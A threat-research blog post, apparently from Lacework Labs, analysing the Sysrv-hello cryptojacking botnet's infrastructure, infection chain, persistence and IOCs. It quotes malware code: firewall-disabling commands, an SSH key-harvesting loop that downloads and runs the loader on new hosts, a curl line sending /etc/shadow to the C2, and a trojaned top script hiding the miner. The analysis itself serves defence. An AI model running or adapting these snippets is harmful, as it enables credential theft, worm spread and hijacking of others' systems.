Sysrv-Hello Expands Infrastructure


Chris Hall and Jared Stroud
Cloud Security Researchers, Lacework Labs


Sysrv-hello is a multi-architecture Cryptojacking (T1496) botnet that first emerged in late 2020, and employs Golang malware compiled into both Linux and Windows payloads. The malware is equal parts XMRig cryptominer and aggressive botnet-propagator. The propagator leverages MySQL and Tomcat brute forcing (T1110) along with a suite of exploits including those for Atlassian and Apache. The malware also leverages several “No CVE” command execution techniques including those for Jupyter notebook and Tomcat Manager.

Key Points

  • Opportunistic actors are targeting cloud workloads through remote code injection/remote code execution vulnerabilities in PHPUnit, Apache Solar, Confluence, Laravel, JBoss, Jira, Sonatype, Oracle WebLogic and Apache Struts to gain initial access (T1190).
  • Lateral movement is conducted via SSH keys available on the victim machine and hosts identified from bash history files, ssh config files, and known_hosts files. (T1021.004)
  • Based on the identified continually expanding C2 infrastructure and Windows compatible builds of the malware, potential for botnet expansion is likely as time continues.

Botnet Infrastructure

First documented in early February by Aliyun as “Sysrv-hello”, the sysrv-hello botnet has since expanded with regards to the volume of specimens and C2 infrastructure. Since early March, five new botnet controllers have been identified with the most recent being IP Most C2 IPs belong to either AS 48693 Rices Privately owned enterprise, or Des Capital B.V. – AS 213035 Des Capital B.V.


C2C2 48693 Rices Privately owned enterprise 48693 Rices Privately owned enterprise 43641 Sollutium EU LLC 213035 Des Capital B.V. 213035 Des Capital B.V. 213035 Des Capital B.V.



Examination of SSH fingerprints data for the C2s uncovered a total of 26 servers that were likely compromised by Sysrv-hello at some point. One server –, was found to have historically used both SSH keys currently in use by Sysrv-hello, indicating they are likely unique to the botnet’s infrastructure. Shodan reports for IPs sharing the SSH keys show an even distribution of couch db and Mosquito/MQTT so its possible these services were exploited by sysrv-hello actors.


C2SSH fingerprinttotal servers


There were also indications that the C2 hosts were active participants in the exploitation process. Host hosts an open FTP server which, at the time of this writing, hosted a file name cmd.vm. This file is a component used in the template injection stage of the Atlassian Confluence Widget Connector exploit (CVE-2019-3396).

Another interesting tactic was custom user-agents specifying the CVE for a given exploit. In the example below, the XML component the Oracle WebLogic Server RCE included a curl request with the exploit’s CVE as a user-agent. This is strictly supplied for tracking purposes and doesn’t determine the server’s response.


Initial Host Infection

Host infection begins with a bash script ( that performs initial host triage prior to downloading the second stage ELF binary – sysrv. The initial bash script changes the default policy to the INPUT, OUTPUT and FORWARD IPTables’ chains to accept before flushing any other firewall rules that exist (T1562.004). Next, the ldr script attempts to overwrite content within /etc/ (T1485), as well as remove any static host entries for mining pools stored within/etc/hosts.

ufw disable
iptables -P INPUT ACCEPT
iptables -F
chattr -ia /etc/
echo > /etc/
chattr -ia /etc/hosts
sed -i '/\|\|\|\|' /etc/hosts

After killing cryptocurrency miners via process name and removing the Aliyun agent (prevalent in Alibaba cloud environments), the second stage payload is downloaded. The second stage payload hosted on the staging server is prefixed with “sysrv”-ARCHITECTURE, where ARCHITECTURE is obtained via uname -m. However, after the file is downloaded, the sysrv binary is renamed based on the output of the command below and then launched.

sys=$(date |md5sum|awk -v n=”$(date +%s)” ‘{print substr($1,1,n%7+6)}’)

The bash script then proceeds to identify SSH private keys within /, /root and /home to use for lateral movement (T1021.004) against IPv4 addresses identified within the user’s bash history,$USER/.ssh/known_hosts and ~/.ssh/config files.

KEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*' | grep -vw pub)
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
KEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
HOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)

In combination with the SSH keys above, a brute force approach of trying every user against every host with every key identified is performed. User’s on the victim host are identified via home directories with the find command. If authentication is successful, a bash one-liner is executed to download and run the script on the new victim host.

    echo "root"
    find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -v "\.ssh"
userlist=$(echo $USERZ | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3" | grep -vw | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
for user in $userlist; do
    for host in $hostlist; do
        for key in $keylist; do
            chmod +r $key; chmod 400 $key
            ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl --user-agent localssh $cc/ || wget --user-agent localssh -q -O - $cc/ | sh"

The Lacework Labs team also identified a curl statement commented out within that would have otherwise exfiltrated the /etc/shadow file via a base64 encoded user-agent string to the server hosting and sysrv. In other various, this command did not have the comment and would be executed.

#curl –user-agent shell_$(cat /etc/shadow|grep “\\$”|base64 -w0) $cc

Other scripts examined by the Lacework Labs team had slight differences in functionality. While all observed samples downloaded the 2nd stage payload of sysrv, some did not perform the lateral movement function. The Lacework Labs team assesses with moderate confidence the scripts are actively being modified while keeping the same filename of so that variants already deployed will still grab the hardcoded value of This claim is supported by variations of being uploaded to VirusTotal.

Persistence on Host

The sysrv binary dropped to disk is a statically linked 64bit UPX packed Golang ELF binary. This binary contains an embedded cryptocurrency miner, XMRig which is renamed to “[kthreaddi]”. The sysrv binary finds a new writable location to drop itself to disk before adding a cron entry (T1053.003). Through multiple sysrv executions, a different cron entry was created each time during dynamic analysis. Each binary being written to disk is the same file as sysrv, with the exception of the newly created file not being UPX packed. The code blocks below show observed file locations sysrv was written to along with the corresponding cron entry.

* * * * * /home/user/.cache/mozilla/firefox/h2od1b24.default-esr/safebrowsing/6zf2ipl

* * * * * /home/user/.cache/pip/wheels/9d/29/32/q2cszj7oi

* * * * * /home/user/.cache/pip/http/c/0/9/8/a/dpm2fu


Upon executing sysrv, the XMRig binary along with the mining configuration file is written to disk in the current directory of execution. Immediately after the execution of XMRig, the XMRig binary and the configuration file are removed via the unlinkat syscall.

unlinkat(AT_FDCWD, "/home/test/.cache/go-build/2f/.Vvqn9kgF/config.json", 0) = 0
unlinkat(AT_FDCWD, "/home/test/.cache/go-build/2f/.Vvqn9kgF/[kthreaddi]", 0) = 0

Evading Detection on Host

The bash script moves /usr/bin/top to /usr/bin/top_ before creating a bash script at /usr/bin/top which removes the XMRig miner (“[kthreaddi] ”) from the process list via a grep command.

mv /usr/bin/top /usr/bin/top_
echo '#!/bin/sh
/usr/bin/top_ -p $(ps aux|grep -v "\[kthreaddi\]"|awk "{print \$2}"|grep -v PID|sort -R|head -n20|tr "\n" ","|sed s"/.$//")' > /usr/bin/top
chmod +x /usr/bin/top

Observed Capabilities of Sysrv

File artifacts observed by the Lacework Labs team indicate the propagator has support for the following exploits:


CVE 2017-9841Code injection vulnerability in Drupal component PHPUnit
CVE 2019-0193Apache Solr Remote Code Execution Vulnerability
CVE 2019-3396Vulnerability in Atlassian Confluence Widget Connector
CVE 2021-3129Laravel ignition RCE
CVE 2017-11610Vulnerability in XML-RPC server in Supervisor
CVE 2017-12149Red Hat JBoss RCE
CVE 2019-11581Critical Template Injection Vulnerability in Atlassian Jira
CVE 2019-7238RCE in Sonatype NXRM 3
CVE 2017-5638Vulnerability in the Apache Struts MVC framework
CVE 2020-14882Oracle WebLogic Server Remote Code Execution


A deeper look into these particular CVEs can be found on on a recent Juniper blog post available here. The entirety of the execution flow can be shown in the diagram below.


Windows Variant

An alternative to is ldr.ps1 for Windows machines. The observed ldr.ps1 is significantly less robust than its Linux counterpart. Focusing largely on killing a handful of other processes prior to downloading and executing sys.exe out of a Windows temp directory. The image below captures the functionality of ldr.ps1

Upon executing sys.exe in the following message being displayed, which translates to “Scanning” in Russian.

During the execution of sys.exe, the XMRig application along with the mining configuration file is written to a temporary directory created within AppData\Local . Just as with the Linux variant, the Windows variation of the miner is also called “[kthreaddi].exe”. The same username that was used in the Linux variant was leveraged within this XMRig configuration file as well. Sys.exe is also written in Golang, and shares similar functionality to the Linux counterpart. As “[kthreaddi].exe” begins to mine Monero, sys.exe attempts to start infecting other machines.

The following pcap shows the initial c2 request performed during behavioral analysis. In this instance, the server returns the command ‘123654’. While the accepted commands for the malware are unclear, this command preceded both the Monero mining and botnet propagation activities.


Total Monero Mined

During analysis the Lacework Labs team recovered the XMRig configuration file. The configuration was set to mine monero from f2pool. Looking up the wallet from f2pool’s website return that at the time of this writing the actors leveraging sysvr have mined slightly over 12.1 worth of monero worth $3,928.46 USD. The image below shows the XMRig configuration being sent over the network to the mining pool.

{"autosave": false, "watch": false, "background": true, "donate-level": 0, "pools":
   [ { "keepalive": true, "url": "",
       "pass": "x" }
    ] }








The sysrv malware takes advantage of known vulnerabilities to spread their Cryptojacking malware. Ensuring public facing applications (T1190) are kept up to date with the latest security patches is critical to avoid opportunistic adversaries from compromising systems. Due to the lateral movement capabilities of the initial bash ( script, if an infected host is found, it is recommended that other hosts listed in authorized_hosts, bash_history, and user’s ~/.ssh/config are inspected for compromise.

All IOCs can be found on the Lacework Labs GitHub. Also, please follow @LaceworkLabs Twitter to keep up with our latest research.



sysrv.exe (UPX packed)80bc76202b75201c740793ea9cd33b31cc262ef01738b053e335ee5d07a5ba96
sysrv (UPX packed)544d20fc286d0803dee86a9c34b4c348333e320a4e33fd2730079701cb6e108f
XMRig Username49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa





TIDTechnique NameObserved Functionality
T1496Resource HijackingCryptojacking
T1110Brute ForceThe sysrv propagation component attempts to brute force MySQL and Tomcat instances.
T1190Exploiting Public ApplicationsLeveraging CVEs to exploit public facing applications.
T1027.002Obfuscated files or information: Software Packing2nd stage payloads were UPX packed.
T1132.001Data Encoding: Standard EncodingBase64 was leveraged within scripts
T1059.004Command and Scripting InterpreterBash scripts were leveraged for spreading their Cryptojacking malware as well as the propagator.
T1021.004Lateral Movement – Remote Services: SSHBash scripts leveraged ssh keys to move to hosts within bash_history, known host files, and ssh configs.
T1562.001Impair Defenses: Disable or Modify ToolsAliyun agent (Alibaba Cloud) is removed. IPTables are flushed and default policy is changed to allow.
T1070.004Indicator Removal on Host: File DeletionThe sysrv payload deletes the underlying XMRig binary after it is launched in Linux environments.
T1140Deobfuscate/Decode Files or InformationBoth the ELF and Win32 variants of sysrv/sys.exe have embedded files.
T1485Data DestructionThe bash script has been observed overwriting contents of /etc/